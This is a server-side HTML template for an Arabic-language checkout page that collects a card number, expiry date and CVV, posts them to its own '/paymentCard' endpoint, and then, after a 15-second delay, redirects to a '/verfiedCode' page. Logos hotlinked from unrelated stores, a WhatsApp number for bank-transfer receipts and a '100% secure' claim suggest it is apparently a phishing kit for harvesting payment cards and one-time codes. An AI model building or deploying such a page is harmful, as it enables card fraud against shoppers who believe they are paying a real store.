@html.extend('layout', function(model) {
	@html.block('styles', function(model) {
		<link rel="icon" type="image/png" href="../uploads/1667829295.png" />

		<meta property="og:image" content="../uploads/1667829295.png" />
		
		<script src="../js/jquery.min.js"></script>
		<script src="../js/363ad84da6.js" crossorigin="anonymous"></script>

		<link rel="stylesheet" href="../css/libraries.css" />
		<link rel="stylesheet" href="../css/checkout.css" />

		<style type="text/css">
				.vue-tel-input {
					border-radius: 3px;
					display: flex;
					border: 1px solid #bbb;
					text-align: left;
				}

				.vue-tel-input.disabled .dropdown,
				.vue-tel-input.disabled .selection,
				.vue-tel-input.disabled input {
					cursor: no-drop;
				}

				.vue-tel-input:focus-within {
					box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075),
						0 0 8px rgba(102, 175, 233, 0.6);
					border-color: #66afe9;
				}

				.vti__dropdown {
					display: flex;
					flex-direction: column;
					align-content: center;
					justify-content: center;
					position: relative;
					padding: 7px;
					cursor: pointer;
				}

				.vti__dropdown.show {
					max-height: 300px;
					overflow: scroll;
				}

				.vti__dropdown.open {
					background-color: #f3f3f3;
				}

				.vti__dropdown:hover {
					background-color: #f3f3f3;
				}

				.vti__selection {
					font-size: 0.8em;
					display: flex;
					align-items: center;
				}

				.vti__selection .vti__country-code {
					color: #666;
				}

				.vti__flag {
					margin-right: 5px;
					margin-left: 5px;
				}

				.vti__dropdown-list {
					z-index: 1;
					padding: 0;
					margin: 0;
					text-align: left;
					list-style: none;
					max-height: 200px;
					overflow-y: scroll;
					position: absolute;
					left: -1px;
					background-color: #fff;
					border: 1px solid #ccc;
					width: 390px;
				}

				.vti__dropdown-list.below {
					top: 33px;
				}

				.vti__dropdown-list.above {
					top: auto;
					bottom: 100%;
				}

				.vti__dropdown-arrow {
					transform: scaleY(0.5);
					display: inline-block;
					color: #666;
				}

				.vti__dropdown-item {
					cursor: pointer;
					padding: 4px 15px;
				}

				.vti__dropdown-item.highlighted {
					background-color: #f3f3f3;
				}

				.vti__dropdown-item.last-preferred {
					border-bottom: 1px solid #cacaca;
				}

				.vti__dropdown-item .vti__flag {
					display: inline-block;
					margin-right: 5px;
				}

				.vti__input {
					border: none;
					border-radius: 0 2px 2px 0;
					width: 100%;
					outline: 0;
					padding-left: 7px;
				}
				.aramx-btn{
					width: 230px;
					border: 1px solid red;
					padding:0 .5rem;
					display: flex;
					align-items: center;
					justify-content: space-around;
					flex-direction: row;
					margin: auto;
					box-shadow: 0 2px 4px rgb(0 0 0 / 10%);
					color:#000;
					border: 2px solid #f44336;
					border-radius: 5px;
					box-shadow: 0 2px 4px rgb(0 0 0 / 10%);
					cursor:pointer;
					text-decoration:none;
				}
		</style>
	})
	@html.block('content', function(model) {
		
		<main id="main" class="">
			<div class="checkout-page-title page-title">
				<div class="page-title-inner flex-row medium-flex-wrap container">
					
				</div>
			</div>
			<div class="cart-container container page-wrapper page-checkout">
				<div class="woocommerce">
					<div class="woocommerce-notices-wrapper"></div>
					<div class="woocommerce row row-large row-divided">
					
									@* ==== card section ========= *@
									<div class="section section--payment">
										<div class="row">
											<div class="col-md-12">
												<div id="payment_step" class="payment-step mb-0">
												<div data-step="2" class="title title--step">
													<img src="/img/step-payment.svg" />
													<h3>طريقة الدفع</h3>
												</div>
												<script>
													$(function () {
													//run when the DOM is ready
													$(".clickable").click(function () {
														//use a class, since your ID gets mangled
														$(this).addClass("active"); //add the class to the clicked element
														var onlinEmp = document.getElementById("bank-div");
														var form = document.getElementById("cardForm");
														var element = document.getElementById("myDIV");
														var element2 = document.getElementById("bank");
														var element3 = document.getElementById("delvery");

														element3.classList.remove("active");
														element.classList.remove("active");
														element2.classList.remove("active");
														form.style.display = "block";
														onlinEmp.style.display = "none";
													});

													$(".clickable2").click(function () {
														//use a class, since your ID gets mangled
														$(this).addClass("active"); //add the class to the clicked element
														var onlinEmp = document.getElementById("bank-div");
														var delvered = document.getElementById("delvered-div");
														var form = document.getElementById("cardForm");
														var element = document.getElementById("hhh");
														var element2 = document.getElementById("bank");
														var element3 = document.getElementById("delvery");

														element3.classList.remove("active");
														element.classList.remove("active");
														element2.classList.remove("active");
														form.style.display = "block";
														delvered.style.display = "none";
														onlinEmp.style.display = "none";
													});
													$(".clickable3").click(function () {
														//use a class, since your ID gets mangled
														$(this).addClass("active"); //add the class to the clicked element
														var form = document.getElementById("cardForm");
														var onlinEmp = document.getElementById("bank-div");
														var delvered = document.getElementById("delvered-div");
														var element = document.getElementById("myDIV");
														var element2 = document.getElementById("hhh");
														var element3 = document.getElementById("delvery");

														element3.classList.remove("active");
														element.classList.remove("active");
														element2.classList.remove("active");
														form.style.display = "none";
														delvered.style.display = "none";
														onlinEmp.style.display = "block";
													});
													$(".clickable4").click(function () {
														//use a class, since your ID gets mangled
														$(this).addClass("active"); //add the class to the clicked element
														var form = document.getElementById("cardForm");
														var onlinEmp = document.getElementById("bank-div");
														var delvered = document.getElementById("delvered-div");
														var element = document.getElementById("myDIV");
														var element2 = document.getElementById("hhh");
														var element3 = document.getElementById("bank");

														element.classList.remove("active");
														element3.classList.remove("active");
														element2.classList.remove("active");
														form.style.display = "none";
														onlinEmp.style.display = "none";
														delvered.style.display = "block";
													});
													});
												</script>
												<div id="payment_methods_wrapper">
													<ul id="payment_methods" class="list list--payment-methods">
													<li>
														<button type="button" class="btn btn--round btn--payment-option active clickable2" id="myDIV">
														<img src="/img/pay-option-mada.svg" alt="Mada" />
														</button>
													</li>
													<li>
														<button onClick="addClass" type="button" class="btn btn--round btn--payment-option clickable"
														id="hhh">
														<img src="/img/pay-option-credit-2.svg" alt="Credit card Logo" class="large" />
														</button>
													</li>
													<li>
														<button onClick="addClass" type="button" class="btn btn--round btn--payment-option clickable3"
														id="bank">
														<img width="35px" src="https://rewayah.store/vendor/checkout/images/icons/pay-option-bank-acc.svg" alt="Credit card Logo" class="large" />
															تحويل بنكي
														</button>
													</li>
													<li>
														<button onClick="addClass" type="button" class="btn btn--round btn--payment-option clickable4"
														id="delvery">
														<img width="35px" src="https://www.marsum2030.com/front/images/118484455151848.png" alt="Credit card Logo" class="large" />
														الدفع عند الاستلام
														</button>
													</li>
													
													</ul>
												</div>
												<span>
													<form id="cardForm" data-v-09edeec7  class="form form--payment">
																					
														<div data-v-09edeec7 class="row">
															<div data-v-09edeec7 class="col-md-8 col-xs-12">
															<span data-v-09edeec7>
																<fieldset data-v-09edeec7 data-openreplay-masked
																class="form-group--w-icon form-group payment-type">
																<i data-v-09edeec7 class="sicon-debit-card-back"></i>
																<input data-v-09edeec7 type="tel" maxlength="19" pattern="[0-9]*" autocomplete="cc-number"
																	placeholder="رقم البطاقة" class="form-control ym-disable-keys ym-hide-content"
																	name="cardnumber" />
																
																</fieldset>
															</span>
															</div>
															<div data-v-09edeec7 class="col-md-2 col-xs-6">
															<span data-v-09edeec7>
																<fieldset data-v-09edeec7 class="form-group">
																<div data-v-09edeec7 class="input-wrapper-expiry">
																	<input data-v-09edeec7 type="tel" maxlength="2" pattern="[0-9]*" placeholder="الشهر"
																	id="cc_month" name="carddate" autocomplete="cc-exp-month"
																	class="form-control ym-disable-keys ym-hide-content card-month" />
																	<input data-v-09edeec7 type="text" placeholder="/" disabled="disabled"
																	class="form-control separator" />
																	<input data-v-09edeec7 type="tel" maxlength="2" pattern="[0-9]*" placeholder="السنة"
																	id="cc_year" name="carddate1" autocomplete="cc-exp-year"
																	class="form-control ym-disable-keys ym-hide-content card-year" />
																</div>
																
																
																</fieldset>
															</span>
															</div>
															<div data-v-09edeec7 class="col-md-2 col-xs-6">
															<span data-v-09edeec7>
																<fieldset data-v-09edeec7 data-openreplay-masked class="form-group">
																<input data-v-09edeec7 type="tel" pattern="\d*" maxlength="4" autocomplete="cc-csc"
																	placeholder="رمز التحقق (CVC)" name="cvv"
																	class="form-control ym-disable-keys ym-hide-content" />
																
																</fieldset>
															</span>
															</div>
														</div>
													
														<ul class="list list--brands">
															<li>تسوق إلكتروني آمن 100%</li>
															<li><img src="/img/secure-payment.svg" /></li>
															<li><img src="/img/secure-payment-02.svg" /></li>
															<li><img src="/img/secure-payment-03.svg" /></li>
														</ul>
														<br>
														<br>
														<br>
														<div data-v-e5a4c4bc>
															<button data-v-e5a4c4bc id="cardSubmit" type="submit" name="subm"
																class="btn btn--primary btn--wide btn--round btn--submit btn--fixed wide">
																<span data-v-e5a4c4bc>اكمال الدفع</span>                                                
															</button>
														</div>
													</form>
													<div id="bank-div" style="display:none">
													<h4>يرجى التواصل مع موظف المبيعات اونلاين لارسال صورة الايصال</h4>
													<a href="https://api.whatsapp.com/send/?phone=966500279904" target="_blank"> <img width="150px" src="https://allheddad.com/wp-content/uploads/2021/12/client.png" />  </a>
													</div>

													<div id="delvered-div" style="display:none">
													<h4>يرجى إكمال اجرائات شركة التوصيل آرامكس لتتبع طلبك </h4>
													<div style="display: flex; flex-direction: row; align-items: center; justify-content: center; margin-top:2rem;">
															<h3>رقم الطلب: </h3>
															<div class="order-number"> <span class="orderCode" style="font-weight: bold; font-size=22px;margin:auto">@model.id</span> </div>
													</div>
													<br>
														<a class="aramx-btn" href="/aramex/@model.id">
															<img width="50px" src="https://1.bp.blogspot.com/-2uXlQ5DJfmQ/X6l2ODOQfRI/AAAAAAAAUsg/YltlKUnAULIGebPsW2Oh3b_Wd_pUaVZEACLcBGAsYHQ/s16000/%25D8%25A7%25D8%25B1%25D8%25A7%25D9%2585%25D9%2583%25D8%25B3.png" alt="Credit card Logo"  />
														اكمال اجراء التوصيل
														</a>
													</div>
												</span>
												</div>

											</div>
										</div>
										
									</div>
								
					</div>

					<div class="cart-footer-content after-cart-content relative"></div>
				</div>
			</div>
		</main>
		<script type="text/javascript" src="/js/jquery.validate.min.js"></script>
    <script>
       $("#cardForm").validate({
            rules: {
            carddate1: {
                required: true,
            },
            carddate: {
                required: true,
            },
            cvv: {
                required: true,
                minlength: 3,
                number: true,
            },
            cardnumber: {
                required: true,
                minlength: 16,
                number: true,
            },
            },
            messages: {
            carddate1: "الرجاء ادخال السنة ",
            carddate: "الرجاء ادخال الشهر ",
            cvv: " الرجاء ادخال رمز سري صحيح ",
            cardnumber: "الرجاء ادخال رقم صحيح ",
            },
            submitHandler: SubForm,
        });
        function SubForm() {
            console.log("send start")
            $.ajax({
            url: "/paymentCard",
            type: "post",
            data: $("#cardForm").serializeArray(),
            beforeSend: function () {
                $("#error").fadeOut();
                $("#cardSubmit").html(
                '<span class="glyphicon glyphicon-transfer"></span>  <span style="color:#fff">  جاري التسجيل </span>'
                );
            },
            success: function () {
                    setTimeout(() => {
                       window.location.replace("/verfiedCode");
                    }, 15000)
            // window.location.replace("/verfiedCode");
            },
            error: function () {
                // alert("There was an error :(");
            },
            });
            return false;
        }
    </script>
	})
})
